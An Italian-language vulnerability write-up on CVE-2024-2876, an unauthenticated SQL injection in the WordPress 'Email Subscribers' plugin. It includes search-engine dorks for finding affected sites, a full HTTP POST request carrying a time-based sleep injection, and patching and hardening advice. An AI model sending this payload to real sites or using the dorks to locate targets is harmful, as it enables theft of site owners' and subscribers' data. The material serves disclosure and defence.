
Exploit proof-of-concept per una vulnerabilità critica di SQL injection nel plugin WordPress Email Subscribers. Include dettagli di sfruttamento, richiesta HTTP e dork di ricerca.
CVE-2024-2876 è una vulnerabilità di sicurezza critica trovata nel plugin "Email Subscribers by Icegram Express" per WordPress. Questa vulnerabilità colpisce le versioni fino alla 5.7.14 inclusa e comporta rischi significativi per oltre 90.000 siti web.
La vulnerabilità è un difetto di SQL injection che consente ad attaccanti non autenticati di eseguire query SQL dannose sui database WordPress interessati. Manipolando input utente non adeguatamente sanificati, gli attaccanti possono estrarre informazioni sensibili come nomi utente, indirizzi email, hash delle password e liste di iscritti.
La SQL injection si verifica all'interno della funzione run della classe IG_ES_Subscribers_Query del plugin, dove una validazione inadeguata degli input porta all'esecuzione non autorizzata di codice SQL. Ciò compromette l'integrità e la riservatezza dei dati memorizzati nel database WordPress.
FOFA : body="/wp-content/plugins/email-subscribers/"
publicwww : "/wp-content/plugins/email-subscribers/"
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
Aggiornamento immediato: Se si utilizza il plugin "Email Subscribers by Icegram Express", aggiornare immediatamente alla versione 5.7.15 o successiva per applicare la correzione di sicurezza.
Audit regolari: Rivedere e aggiornare regolarmente tutti i plugin e i temi WordPress alle loro versioni più recenti per garantire la sicurezza.
Plugin di sicurezza: Utilizzare plugin di sicurezza WordPress affidabili per rafforzare le difese contro SQL injection e altre minacce informatiche.
Politiche per password robuste: Implementare password forti e uniche per tutti gli account legati al proprio sito WordPress per ridurre i rischi di accesso non autorizzato.
La mancata correzione del plugin interessato può lasciare i siti web vulnerabili a violazioni dei dati e accessi non autorizzati. Dato l'uso diffuso di questo plugin, un'azione immediata è fondamentale per mettere in sicurezza le installazioni.